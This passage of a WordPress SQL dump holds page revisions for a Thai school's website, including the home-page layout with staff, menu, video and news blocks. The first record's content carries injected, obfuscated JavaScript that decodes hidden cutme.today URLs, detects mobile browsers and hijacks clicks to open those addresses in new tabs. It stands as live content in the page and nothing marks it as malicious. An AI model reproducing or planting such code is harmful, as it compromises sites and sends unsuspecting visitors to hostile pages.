_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-27 11:50:22','2024-08-27 04:50:22','',19,'http://watprato.ssk.in.th/?p=223',0,'revision','',0),
(224,2,'2024-08-27 11:56:30','2024-08-27 04:56:30','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1X6Ept6IxYaNET5DErIMExwq1jHu3vOIS/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 